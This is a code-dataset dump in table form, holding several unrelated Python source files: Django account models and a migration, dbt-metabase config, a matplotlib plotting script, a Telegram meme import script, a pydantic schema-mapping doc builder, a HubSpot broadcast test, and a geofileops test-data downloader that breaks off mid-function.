repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
sheriffbarrow/production-ecommerce | src/production_ecommerce/account/models.py | cb1a29795ff8e9b4aa95a78df50bb8aa3e5f4350 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
class MyAccountManager(BaseUserManager):
def create_user(self, email, username, password=None):
if not email:
raise ValueError('Users must have an email address')
if not username:
raise ValueError('Users must have a username')
user = self.model(
email=self.normalize_email(email),
username=username,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, username, password):
user = self.create_user(
email=self.normalize_email(email),
password=password,
username=username,
)
user.is_admin = True
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class UserVendor(AbstractBaseUser):
email = models.EmailField(verbose_name='email address',max_length=255,unique=True)
contact = models.IntegerField(null=True, blank=True)
username = models.CharField(max_length=30)
location = models.CharField(max_length=30)
profession = models.CharField(max_length=30)
experience = models.CharField(max_length=30)
verified_id = models.CharField(max_length=255)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
image = models.ImageField(default='profile1.png' ,upload_to='profiles/images/', null=True, blank=True)
# notice the absence of a "Password field", that is built in.
objects = MyAccountManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username'] # Email & Password are required by default.
def __str__(self):
return self.email
# For checking permissions. to keep it simple all admin have ALL permissons
def has_perm(self, perm, obj=None):
return self.is_admin
# Does this user have permission to view this app? (ALWAYS YES FOR SIMPLICITY)
def has_module_perms(self, app_label):
return True
class Client(AbstractBaseUser):
email = models.EmailField(verbose_name='email address',max_length=255,unique=True)
contact = models.IntegerField(null=True, blank=True)
username = models.CharField(max_length=30)
location = models.CharField(max_length=30)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
# notice the absence of a "Password field", that is built in.
objects = MyAccountManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username'] # Email & Password are required by default.
def __str__(self):
return self.email
# For checking permissions. to keep it simple all admin have ALL permissons
def has_perm(self, perm, obj=None):
return self.is_admin
# Does this user have permission to view this app? (ALWAYS YES FOR SIMPLICITY)
def has_module_perms(self, app_label):
return True
| [((35, 9, 35, 83), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((36, 11, 36, 53), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((37, 12, 37, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((38, 12, 38, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((39, 14, 39, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((40, 14, 40, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((41, 15, 41, 47), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((42, 15, 42, 82), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((43, 15, 43, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((44, 15, 44, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((45, 15, 45, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((46, 9, 46, 103), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import models\n'), ((67, 9, 67, 83), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((68, 11, 68, 53), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((69, 12, 69, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((70, 12, 70, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((71, 15, 71, 82), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((72, 15, 72, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((73, 15, 73, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((74, 15, 74, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n')] |
fernandobrito/dbt-metabase | dbtmetabase/models/config.py | a1fa5a2c7c5e3cf12ead8806d39f6bd3a212fb83 | from dataclasses import dataclass, field
from typing import Optional, Iterable, Union
@dataclass
class MetabaseConfig:
# Metabase Client
database: str
host: str
user: str
password: str
# Metabase additional connection opts
use_http: bool = False
verify: Union[str, bool] = True
# Metabase Sync
sync_skip: bool = False
sync_timeout: Optional[int] = None
@dataclass
class DbtConfig:
# dbt Reader
database: str
manifest_path: Optional[str] = None
path: Optional[str] = None
# dbt Target Models
schema: Optional[str] = None
schema_excludes: Iterable = field(default_factory=list)
includes: Iterable = field(default_factory=list)
excludes: Iterable = field(default_factory=list)
| [((28, 32, 28, 59), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((29, 25, 29, 52), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((30, 25, 30, 52), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n')] |
arunksaha/heap_tracker | src/plot_timeseries_outstanding_bytes.py | 0755c6b9c3e4e621efda31c144421a1e67e51a9c | #
# Copyright 2018, Arun Saha <[email protected]>
#
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as md
import datetime as dt
import sys
import os
# Open the file, read the string contents into a list,
# and return the list.
def GetLinesListFromFile(filename):
with open(filename) as f:
content = f.readlines()
return content
# Convert usecs (numeric) to datetime
# >>> ts = 1520189090755278 / 1000000.0
# >>> x = datetime.datetime.fromtimestamp(ts)
# >>> x.strftime('%Y-%m-%d %H:%M:%S.%f')
# '2018-03-04 10:44:50.755278'
def ConvertUsecsEpochToDateTime(usecs):
secs = usecs / 1000000.0
# Attempt to parse usecs throws:
# ValueError: year is out of range
# So, using secs instead. REVISIT.
# datetimeObj = dt.datetime.fromtimestamp(usecs)
datetimeObj = dt.datetime.fromtimestamp(secs)
# print usecs, secs, datetimeObj
return datetimeObj
# Take a list of string tuples (timestamp, metric),
# parses them into numerical values and returns
# separate lists.
def GetTxListFromFile(filename):
lineList = GetLinesListFromFile(filename)
datetimeList = []
outBytesList = []
for line in lineList:
tokens = line.split()
# print tokens
assert(len(tokens) >= 2)
usecs = int(tokens[0])
bytes = int(tokens[1])
datetimeObj = ConvertUsecsEpochToDateTime(usecs)
datetimeList.append(datetimeObj)
outBytesList.append(bytes)
return datetimeList, outBytesList
# Plotting driver program.
def driver(dataFile):
datetimeList, outBytesList = GetTxListFromFile(dataFile)
plt.subplots_adjust(bottom = 0.2)
plt.xticks(rotation = 25)
ax = plt.gca()
# Intended to show micro-seconds, but facing some problem,
# see REVISIT above.
# xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S.%f')
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
# Avoid scientific notatinn, use plain numbers.
ax.get_yaxis().get_major_formatter().set_scientific(False)
# Make the numbers comma separated.
ax.get_yaxis().set_major_formatter(
matplotlib.ticker.FuncFormatter(lambda bytes, p: format(int(bytes), ',')))
# Intended the y-axis numbers on both sides, but not working.
ax.yaxis.set_ticks_position('both')
plt.plot(datetimeList, outBytesList)
plt.title('Outstanding Bytes Timeseries')
plt.ylabel('bytes')
plt.xlabel('timestamp')
plt.grid(True)
plt.show()
# main
if len(sys.argv) == 1:
print "usage: {} <input-text-file>".format(sys.argv[0])
sys.exit(1)
driver(sys.argv[1])
| [] |
vmariano/meme-classifier | import.py | e8d6e73e4a843542143f20381c0741df16d3945d | from dotenv import load_dotenv
load_dotenv()
import sys
import os
import re
import json
import psycopg2
from meme_classifier.images import process_image
path = sys.argv[1]
data = json.load(open(os.path.join(path, 'result.json'), 'r'))
chat_id = data['id']
conn = psycopg2.connect(os.getenv('POSTGRES_CREDENTIALS'))
for m in data['messages']:
if 'photo' in m:
template, text = process_image(open(os.path.join(path, m['photo']), 'rb'))
message_id = m['id']
print(f'processing message {message_id}')
cur = conn.cursor()
cur.execute("INSERT INTO meme (template, text, chat_id, message_id) VALUES (%s, %s, %s, %s)", (template, text, chat_id, message_id))
conn.commit()
| [((2, 0, 2, 13), 'dotenv.load_dotenv', 'load_dotenv', ({}, {}), '()', False, 'from dotenv import load_dotenv\n'), ((16, 24, 16, 57), 'os.getenv', 'os.getenv', ({(16, 34, 16, 56): '"""POSTGRES_CREDENTIALS"""'}, {}), "('POSTGRES_CREDENTIALS')", False, 'import os\n'), ((14, 22, 14, 55), 'os.path.join', 'os.path.join', ({(14, 35, 14, 39): 'path', (14, 41, 14, 54): '"""result.json"""'}, {}), "(path, 'result.json')", False, 'import os\n'), ((20, 44, 20, 74), 'os.path.join', 'os.path.join', ({(20, 57, 20, 61): 'path', (20, 63, 20, 73): "m['photo']"}, {}), "(path, m['photo'])", False, 'import os\n')] |
jak0203/nps-dash | nps/migrations/0013_auto_20180314_1805.py | 9a3bdb0e55e0c857bcce8ed8df04b52a2b71872f | # Generated by Django 2.0.3 on 2018-03-15 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nps', '0012_auto_20180314_1600'),
]
operations = [
migrations.CreateModel(
name='ClientAggregations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('client', models.CharField(max_length=30)),
('survey', models.CharField(max_length=30)),
('user_type', models.CharField(blank=True, default=None, max_length=30, null=True)),
('nps_score', models.FloatField()),
('total_responses', models.IntegerField()),
('promoters', models.IntegerField()),
('detractors', models.IntegerField()),
('neutral', models.IntegerField()),
('percent_detractors', models.FloatField(blank=True, default=None, null=True)),
('percent_promoters', models.FloatField(blank=True, default=None, null=True)),
('percent_neutral', models.FloatField(blank=True, default=None, null=True)),
('statistically_significant', models.BooleanField(default=False)),
],
),
migrations.DeleteModel(
name='AggregatedResults',
),
migrations.DeleteModel(
name='ProductUsers',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RemoveField(
model_name='productaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='productaggregations',
name='percent_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='percent_clients_neutral',
),
migrations.AddField(
model_name='productaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AddField(
model_name='surveyaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AlterUniqueTogether(
name='clientaggregations',
unique_together={('client', 'survey', 'user_type')},
),
]
| [((31, 8, 33, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations, models\n'), ((34, 8, 36, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations, models\n'), ((37, 8, 41, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((42, 8, 46, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((47, 8, 51, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((52, 8, 56, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((57, 8, 61, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((62, 8, 66, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((67, 8, 71, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((72, 8, 76, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((77, 8, 81, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((82, 8, 86, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((87, 8, 90, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((91, 8, 94, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((95, 8, 98, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((99, 8, 102, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((113, 8, 116, 9), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', (), '', False, 'from django.db import migrations, models\n'), ((106, 18, 106, 86), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((111, 18, 111, 86), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((16, 23, 16, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((17, 27, 17, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((18, 27, 18, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((19, 30, 19, 98), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((20, 30, 20, 49), 'django.db.models.FloatField', 'models.FloatField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((21, 36, 21, 57), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((22, 30, 22, 51), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((23, 31, 23, 52), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((24, 28, 24, 49), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((25, 39, 25, 93), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((26, 38, 26, 92), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((27, 36, 27, 90), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((28, 46, 28, 80), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n')] |
NoAnyLove/pydantic | docs/schema_mapping.py | 50fd2c5b48ffe611b5c4feb24f26f7202217faab | #!/usr/bin/env python3
"""
Build a table of Python / Pydantic to JSON Schema mappings.
Done like this rather than as a raw rst table to make future edits easier.
Please edit this file directly not .tmp_schema_mappings.rst
"""
table = [
[
'bool',
'boolean',
'',
'JSON Schema Core',
''
],
[
'str',
'string',
'',
'JSON Schema Core',
''
],
[
'float',
'number',
'',
'JSON Schema Core',
''
],
[
'int',
'integer',
'',
'JSON Schema Validation',
''
],
[
'dict',
'object',
'',
'JSON Schema Core',
''
],
[
'list',
'array',
'',
'JSON Schema Core',
''
],
[
'tuple',
'array',
'',
'JSON Schema Core',
''
],
[
'set',
'array',
'{"uniqueItems": true}',
'JSON Schema Validation',
''
],
[
'List[str]',
'array',
'{"items": {"type": "string"}}',
'JSON Schema Validation',
'And equivalently for any other sub type, e.g. List[int].'
],
[
'Tuple[str, int]',
'array',
'{"items": [{"type": "string"}, {"type": "integer"}]}',
'JSON Schema Validation',
(
'And equivalently for any other set of subtypes. Note: If using schemas for OpenAPI, '
'you shouldn\'t use this declaration, as it would not be valid in OpenAPI (although it is '
'valid in JSON Schema).'
)
],
[
'Dict[str, int]',
'object',
'{"additionalProperties": {"type": "integer"}}',
'JSON Schema Validation',
(
'And equivalently for any other subfields for dicts. Have in mind that although you can use other types as '
'keys for dicts with Pydantic, only strings are valid keys for JSON, and so, only str is valid as '
'JSON Schema key types.'
)
],
[
'Union[str, int]',
'anyOf',
'{"anyOf": [{"type": "string"}, {"type": "integer"}]}',
'JSON Schema Validation',
'And equivalently for any other subfields for unions.'
],
[
'Enum',
'enum',
'{"enum": [...]}',
'JSON Schema Validation',
'All the literal values in the enum are included in the definition.'
],
[
'SecretStr',
'string',
'{"writeOnly": true}',
'JSON Schema Validation',
''
],
[
'SecretBytes',
'string',
'{"writeOnly": true}',
'JSON Schema Validation',
''
],
[
'EmailStr',
'string',
'{"format": "email"}',
'JSON Schema Validation',
''
],
[
'NameEmail',
'string',
'{"format": "name-email"}',
'Pydantic standard "format" extension',
''
],
[
'UrlStr',
'string',
'{"format": "uri"}',
'JSON Schema Validation',
''
],
[
'DSN',
'string',
'{"format": "dsn"}',
'Pydantic standard "format" extension',
''
],
[
'bytes',
'string',
'{"format": "binary"}',
'OpenAPI',
''
],
[
'Decimal',
'number',
'',
'JSON Schema Core',
''
],
[
'UUID1',
'string',
'{"format": "uuid1"}',
'Pydantic standard "format" extension',
''
],
[
'UUID3',
'string',
'{"format": "uuid3"}',
'Pydantic standard "format" extension',
''
],
[
'UUID4',
'string',
'{"format": "uuid4"}',
'Pydantic standard "format" extension',
''
],
[
'UUID5',
'string',
'{"format": "uuid5"}',
'Pydantic standard "format" extension',
''
],
[
'UUID',
'string',
'{"format": "uuid"}',
'Pydantic standard "format" extension',
'Suggested in OpenAPI.'
],
[
'FilePath',
'string',
'{"format": "file-path"}',
'Pydantic standard "format" extension',
''
],
[
'DirectoryPath',
'string',
'{"format": "directory-path"}',
'Pydantic standard "format" extension',
''
],
[
'Path',
'string',
'{"format": "path"}',
'Pydantic standard "format" extension',
''
],
[
'datetime',
'string',
'{"format": "date-time"}',
'JSON Schema Validation',
''
],
[
'date',
'string',
'{"format": "date"}',
'JSON Schema Validation',
''
],
[
'time',
'string',
'{"format": "time"}',
'JSON Schema Validation',
''
],
[
'timedelta',
'number',
'{"format": "time-delta"}',
'Difference in seconds (a ``float``), with Pydantic standard "format" extension',
'Suggested in JSON Schema repository\'s issues by maintainer.'
],
[
'Json',
'string',
'{"format": "json-string"}',
'Pydantic standard "format" extension',
''
],
[
'IPvAnyAddress',
'string',
'{"format": "ipvanyaddress"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 address as used in ``ipaddress`` module',
],
[
'IPvAnyInterface',
'string',
'{"format": "ipvanyinterface"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 interface as used in ``ipaddress`` module',
],
[
'IPvAnyNetwork',
'string',
'{"format": "ipvanynetwork"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 network as used in ``ipaddress`` module',
],
[
'StrictStr',
'string',
'',
'JSON Schema Core',
''
],
[
'ConstrainedStr',
'string',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``constr`` below.'
)
],
[
'constr(regex=\'^text$\', min_length=2, max_length=10)',
'string',
'{"pattern": "^text$", "minLength": 2, "maxLength": 10}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'ConstrainedInt',
'integer',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``conint`` below.'
)
],
[
'conint(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'integer',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
'',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'PositiveInt',
'integer',
'{"exclusiveMinimum": 0}',
'JSON Schema Validation',
''
],
[
'NegativeInt',
'integer',
'{"exclusiveMaximum": 0}',
'JSON Schema Validation',
''
],
[
'ConstrainedFloat',
'number',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations.'
'See the mapping for ``confloat`` below.'
)
],
[
'confloat(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'number',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'PositiveFloat',
'number',
'{"exclusiveMinimum": 0}',
'JSON Schema Validation',
''
],
[
'NegativeFloat',
'number',
'{"exclusiveMaximum": 0}',
'JSON Schema Validation',
''
],
[
'ConstrainedDecimal',
'number',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``condecimal`` below.'
)
],
[
'condecimal(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'number',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'BaseModel',
'object',
'',
'JSON Schema Core',
'All the properties defined will be defined with standard JSON Schema, including submodels.'
]
]
headings = [
'Python type',
'JSON Schema Type',
'Additional JSON Schema',
'Defined in',
'Notes',
]
v = ''
col_width = 300
for _ in range(5):
v += '+' + '-' * col_width
v += '+\n|'
for heading in headings:
v += f' {heading:{col_width - 2}} |'
v += '\n'
for _ in range(5):
v += '+' + '=' * col_width
v += '+'
for row in table:
v += '\n|'
for i, text in enumerate(row):
text = f'``{text}``' if i < 3 and text else text
v += f' {text:{col_width - 2}} |'
v += '\n'
for _ in range(5):
v += '+' + '-' * col_width
v += '+'
with open('.tmp_schema_mappings.rst', 'w') as f:
f.write(v)
| [] |
kevin2357/hubspot3 | hubspot3/test/test_broadcast.py | 488f6ff4195034317d99431439087443bca1469f | import time
import unittest
from nose.plugins.attrib import attr
from hubspot3.test import helper
from hubspot3.broadcast import Broadcast, BroadcastClient
class BroadcastClientTest(unittest.TestCase):
""" Unit tests for the HubSpot Broadcast API Python client.
This file contains some unittest tests for the Broadcast API.
Questions, comments: http://docs.hubapi.com/wiki/Discussion_Group
"""
def setUp(self):
self.client = BroadcastClient(**helper.get_options())
self.broadcast_guids = None
def tearDown(self):
# Cancel any broadcasts created as part of the tests
if self.broadcast_guids:
list(map(self.client.cancel_broadcast, self.broadcast_guids))
@attr("api")
def test_get_broadcasts(self):
# Should fetch at least 1 broadcast on the test portal 62515
broadcasts = self.client.get_broadcasts(limit=1)
self.assertTrue(len(broadcasts) > 0)
broadcast = broadcasts[0].to_dict()
self.assertIsNotNone(broadcast["channelGuid"])
print("\n\nFetched some broadcasts")
broadcast_guid = broadcast["broadcastGuid"]
# Re-fetch the broadcast using different call
bcast = self.client.get_broadcast(broadcast_guid)
# Should have expected fields
self.assertIsNotNone(bcast.broadcast_guid)
self.assertIsNotNone(bcast.channel_guid)
self.assertIsNotNone(bcast.status)
@attr("api")
def test_get_channels(self):
# Fetch older channels ensured to exist
channels = self.client.get_channels(current=True)
self.assertTrue(len(channels) > 0)
@attr("api")
def test_create_broadcast(self):
content = dict(body="Test hubspot3 unit tests http://www.hubspot.com")
channels = self.client.get_channels(current=True, publish_only=True)
if len(channels) == 0:
self.fail("Failed to find a publishable channel")
channel = channels[0]
# Get a trigger in the future
trigger_at = int(time.time() + 6000) * 1000
bcast = Broadcast(
{
"content": content,
"triggerAt": trigger_at,
"channelGuid": channel.channel_guid,
}
)
try:
resp = self.client.create_broadcast(bcast)
broadcast = Broadcast(resp)
self.assertIsNotNone(broadcast.broadcast_guid)
self.assertEqual(channel.channel_guid, broadcast.channel_guid)
# Ensure it is canceled
self.broadcast_guids = []
self.broadcast_guids.append(broadcast.broadcast_guid)
except Exception as e:
self.fail("Should not have raised exception: {}".format(e))
if __name__ == "__main__":
unittest.main()
| [((25, 5, 25, 16), 'nose.plugins.attrib.attr', 'attr', ({(25, 10, 25, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((43, 5, 43, 16), 'nose.plugins.attrib.attr', 'attr', ({(43, 10, 43, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((49, 5, 49, 16), 'nose.plugins.attrib.attr', 'attr', ({(49, 10, 49, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((81, 4, 81, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((60, 16, 66, 9), 'hubspot3.broadcast.Broadcast', 'Broadcast', ({(61, 12, 65, 13): "{'content': content, 'triggerAt': trigger_at, 'channelGuid': channel.\n channel_guid}"}, {}), "({'content': content, 'triggerAt': trigger_at, 'channelGuid':\n channel.channel_guid})", False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((70, 24, 70, 39), 'hubspot3.broadcast.Broadcast', 'Broadcast', ({(70, 34, 70, 38): 'resp'}, {}), '(resp)', False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((17, 40, 17, 60), 'hubspot3.test.helper.get_options', 'helper.get_options', ({}, {}), '()', False, 'from hubspot3.test import helper\n'), ((59, 25, 59, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
theroggy/geofile_ops | benchmark/benchmarks/testdata.py | 1b5ab42169d5c3332c0d8298c5a036257cfd68d5 | # -*- coding: utf-8 -*-
"""
Module to prepare test data for benchmarking geo operations.
"""
import enum
import logging
from pathlib import Path
import pprint
import shutil
import sys
import tempfile
from typing import Optional
import urllib.request
import zipfile
# Add path so the benchmark packages are found
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent))
import geofileops as gfo
################################################################################
# Some inits
################################################################################
logger = logging.getLogger(__name__)
################################################################################
# The real work
################################################################################
class TestFile(enum.Enum):
AGRIPRC_2018 = (
0,
"https://downloadagiv.blob.core.windows.net/landbouwgebruikspercelen/2018/Landbouwgebruikspercelen_LV_2018_GewVLA_Shape.zip",
"agriprc_2018.gpkg",
)
AGRIPRC_2019 = (
1,
"https://downloadagiv.blob.core.windows.net/landbouwgebruikspercelen/2019/Landbouwgebruikspercelen_LV_2019_GewVLA_Shapefile.zip",
"agriprc_2019.gpkg",
)
COMMUNES = (
2,
"https://downloadagiv.blob.core.windows.net/referentiebestand-gemeenten/VoorlopigRefBestandGemeentegrenzen_2019-01-01/VRBG_toestand_16_05_2018_(geldend_vanaf_01_01_2019)_GewVLA_Shape.zip",
"communes.gpkg",
)
def __init__(self, value, url, filename):
self._value_ = value
self.url = url
self.filename = filename
def get_file(self, tmp_dir: Path) -> Path:
testfile_path = download_samplefile(
url=self.url, dst_name=self.filename, dst_dir=tmp_dir
)
testfile_info = gfo.get_layerinfo(testfile_path)
logger.debug(
f"TestFile {self.name} contains {testfile_info.featurecount} rows."
)
return testfile_path
def download_samplefile(
url: str, dst_name: str, dst_dir: Optional[Path] = None
) -> Path:
"""
Download a sample file to dest_path.
If it is zipped, it will be unzipped. If needed, it will be converted to
the file type as determined by the suffix of dst_name.
Args:
url (str): the url of the file to download
dst_dir (Path): the dir to downloaded the sample file to.
If it is None, a dir in the default tmp location will be
used. Defaults to None.
Returns:
Path: the path to the downloaded sample file.
"""
# If the destination path is a directory, use the default file name
dst_path = prepare_dst_path(dst_name, dst_dir)
# If the sample file already exists, return
if dst_path.exists():
return dst_path
# Make sure the destination directory exists
dst_path.parent.mkdir(parents=True, exist_ok=True)
# If the url points to a file with the same suffix as the dst_path,
# just download
url_path = Path(url)
if url_path.suffix.lower() == dst_path.suffix.lower():
logger.info(f"Download to {dst_path}")
urllib.request.urlretrieve(url, dst_path)
else:
# The file downloaded is different that the destination wanted, so some
# converting will need to be done
tmp_dir = dst_path.parent / "tmp"
try:
# Remove tmp dir if it exists already
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
tmp_dir.mkdir(parents=True, exist_ok=True)
# Download file
tmp_path = tmp_dir / f"{dst_path.stem}{url_path.suffix.lower()}"
logger.info(f"Download tmp data to {tmp_path}")
urllib.request.urlretrieve(url, tmp_path)
# If the temp file is a .zip file, unzip to dir
if tmp_path.suffix == ".zip":
# Unzip
unzippedzip_dir = dst_path.parent / tmp_path.stem
logger.info(f"Unzip to {unzippedzip_dir}")
with zipfile.ZipFile(tmp_path, "r") as zip_ref:
zip_ref.extractall(unzippedzip_dir)
# Look for the file
tmp_paths = []
for suffix in [".shp", ".gpkg"]:
tmp_paths.extend(list(unzippedzip_dir.rglob(f"*{suffix}")))
if len(tmp_paths) == 1:
tmp_path = tmp_paths[0]
else:
raise Exception(
